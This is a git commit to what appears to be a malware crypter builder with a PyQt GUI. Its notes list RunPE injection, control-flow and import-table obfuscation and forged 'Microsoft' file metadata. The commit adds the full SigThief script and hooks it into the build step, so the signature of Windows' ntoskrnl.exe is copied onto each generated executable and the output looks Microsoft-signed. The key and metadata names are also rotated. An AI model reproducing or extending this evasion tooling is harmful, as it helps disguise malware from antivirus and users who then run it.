add: PE signing using SigThief

2023-09-05 13:53:09 +02:00
parent db2e903ff0
commit 3ea146b42c
4 changed files with 291 additions and 7 deletions
--- a/DllExecutor.rc
+++ b/DllExecutor.rc
@@ -68,12 +68,12 @@ BEGIN
        BLOCK "040c04b0"
        BEGIN
 			VALUE "CompanyName", "Microsoft"
-			VALUE "FileDescription", "jdsuughxufchunsialxn"
+			VALUE "FileDescription", "qvxogvnpqxmjnhjylnrz"
 			VALUE "FileVersion", "1.0.0.1"
-			VALUE "InternalName", "vrkfgkl.exe"
+			VALUE "InternalName", "xmunjmp.exe"
 			VALUE "LegalCopyright", "Copyright (C) 2023"
-			VALUE "OriginalFilename", "igjrjdp.exe"
-			VALUE "ProductName", "vpdbkij.exe"
+			VALUE "OriginalFilename", "qqohwcv.exe"
+			VALUE "ProductName", "zwmwzkm.exe"
            VALUE "ProductVersion", "1.0.0.1"
        END
    END
--- a/config.h
+++ b/config.h
@@ -1,2 +1,2 @@
 #pragma once
-#define KEY "qffjydbdhrk"
+#define KEY "gepjfipejnw"
--- a/gui.py
+++ b/gui.py
@@ -14,7 +14,7 @@ TODO :
    - Good Section sizes
    - Add resources
    - Random Windows API calls (help)
-    - Code signing (optional)
+    - Code signing

 Done :
    - RunPE
@@ -22,6 +22,7 @@ Done :
    - Control flow
    - IAT obfuscation (adding "normal" imports in addition to the others)
    - Change PE metadata (company, description, etc...)
+    - File icon
 """

 from PyQt5 import QtCore, QtGui, QtWidgets
@@ -196,7 +197,7 @@ class Ui_mainWindow(object):
        
        if return_code :
            self.label_2.setText("build failed.")
-            QCoreApplication.processEvents()   
+            QCoreApplication.processEvents()

        # Cleaning up..
        os.remove("main.cpp")
@@ -205,6 +206,21 @@ class Ui_mainWindow(object):
        if not return_code :
            self.label_2.setText(f"--> {out_filename}")
            QCoreApplication.processEvents()
+        else :
+            return
+        
+        self.label_2.setText("Signing the file...")
+        QCoreApplication.processEvents()
+        
+        windir = os.getenv("WINDIR")
+        cmd = f'python sigthief.py -i "{windir}\\System32\\ntoskrnl.exe" -t {out_filename} -o {out_filename.replace(".exe","")+"_signed"}.exe'
+        os.system(cmd)
+        
+        os.remove(out_filename)
+        os.rename(out_filename.replace(".exe","")+"_signed.exe", out_filename)
+        
+        self.label_2.setText("done.")
+        QCoreApplication.processEvents()
        
    def fileDialog(self):
        options = QtWidgets.QFileDialog.Options()
--- a/sigthief.py
+++ b/sigthief.py
@@ -0,0 +1,268 @@
+#!/usr/bin/env python3
+# LICENSE: BSD-3
+# Copyright: Josh Pitts @midnite_runr
+
+import sys
+import struct
+import shutil
+import io
+from optparse import OptionParser
+
+
+def gather_file_info_win(binary):
+        """
+        Borrowed from BDF...
+        I could just skip to certLOC... *shrug*
+        """
+        flItms = {}
+        binary = open(binary, 'rb')
+        binary.seek(int('3C', 16))
+        flItms['buffer'] = 0
+        flItms['JMPtoCodeAddress'] = 0
+        flItms['dis_frm_pehdrs_sectble'] = 248
+        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
+        # Start of COFF
+        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
+        binary.seek(flItms['COFF_Start'])
+        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
+        binary.seek(flItms['COFF_Start'] + 2, 0)
+        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
+        binary.seek(flItms['COFF_Start'] + 16, 0)
+        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
+        #End of COFF
+        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
+
+        #if flItms['SizeOfOptionalHeader']:
+            #Begin Standard Fields section of Optional Header
+        binary.seek(flItms['OptionalHeader_start'])
+        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfUninitializedData'] = struct.unpack("<I",
+                                                               binary.read(4))[0]
+        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
+        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
+        if flItms['Magic'] != 0x20B:
+            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
+        # End Standard Fields section of Optional Header
+        # Begin Windows-Specific Fields of Optional Header
+        if flItms['Magic'] == 0x20B:
+            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
+        else:
+            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfImageLoc'] = binary.tell()
+        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
+        if flItms['Magic'] == 0x20B:
+            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
+
+        else:
+            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
+        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
+        # End Windows-Specific Fields of Optional Header
+        # Begin Data Directories of Optional Header
+        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
+        #ImportTable SIZE|LOC
+        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['CertTableLOC'] = binary.tell()
+        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
+        binary.close()
+        return flItms
+
+
+def copyCert(exe):
+    flItms = gather_file_info_win(exe)
+
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Input file Not signed!")
+        sys.exit(-1)
+
+    with open(exe, 'rb') as f:
+        f.seek(flItms['CertLOC'], 0)
+        cert = f.read(flItms['CertSize'])
+    return cert
+
+
+def writeCert(cert, exe, output):
+    flItms = gather_file_info_win(exe)
+    
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+
+    print("Signature appended. \nFIN.")
+
+
+def outputCert(exe, output):
+    cert = copyCert(exe)
+    if not output:
+        output = str(exe) + "_sig"
+
+    print("Output file: {0}".format(output))
+
+    open(output, 'wb').write(cert)
+
+    print("Signature ripped. \nFIN.")
+
+
+def check_sig(exe):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+    else:
+        print("Inputfile is signed!")
+
+
+def truncate(exe, output):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+        sys.exit(-1)
+    else:
+        print( "Inputfile is signed!")
+
+    if not output:
+        output = str(exe) + "_nosig"
+
+    print("Output file: {0}".format(output))
+
+    shutil.copy2(exe, output)
+
+    with open(output, "r+b") as binary:
+        print('Overwriting certificate table pointer and truncating binary')
+        binary.seek(-flItms['CertSize'], io.SEEK_END)
+        binary.truncate()
+        binary.seek(flItms['CertTableLOC'], 0)
+        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
+
+    print("Signature removed. \nFIN.")
+
+
+def signfile(exe, sigfile, output):
+    flItms = gather_file_info_win(exe)
+    
+    cert = open(sigfile, 'rb').read()
+
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+    
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+    print("Signature appended. \nFIN.")
+
+
+if __name__ == "__main__":
+    usage = 'usage: %prog [options]'
+    print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
+    parser = OptionParser()
+    parser.add_option("-i", "--file", dest="inputfile", 
+                  help="input file", metavar="FILE")
+    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
+                  help='rip signature off inputfile')
+    parser.add_option('-a', '--add', dest='addsig', action='store_true',
+                  help='add signautre to targetfile')
+    parser.add_option('-o', '--output', dest='outputfile',
+                  help='output file')
+    parser.add_option('-s', '--sig', dest='sigfile',
+                  help='binary signature from disk')
+    parser.add_option('-t', '--target', dest='targetfile',
+                  help='file to append signature to')
+    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
+                  help='file to check if signed; does not verify signature')
+    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
+                  help='truncate signature (i.e. remove sig)')
+    (options, args) = parser.parse_args()
+    
+    # rip signature
+    # inputfile and rip to outputfile
+    if options.inputfile and options.ripsig:
+        print("Ripping signature to file!")
+        outputCert(options.inputfile, options.outputfile)
+        sys.exit()    
+
+    # copy from one to another
+    # inputfile and rip to targetfile to outputfile    
+    if options.inputfile and options.targetfile:
+        cert = copyCert(options.inputfile)
+        writeCert(cert, options.targetfile, options.outputfile)
+        sys.exit()
+
+    # check signature
+    # inputfile 
+    if options.inputfile and options.checksig:
+        check_sig(options.inputfile) 
+        sys.exit()
+
+    # add sig to target file
+    if options.targetfile and options.sigfile:
+        signfile(options.targetfile, options.sigfile, options.outputfile)
+        sys.exit()
+        
+    # truncate
+    if options.inputfile and options.truncate:
+        truncate(options.inputfile, options.outputfile)
+        sys.exit()
+
+    parser.print_help()
+    parser.error("You must do something!")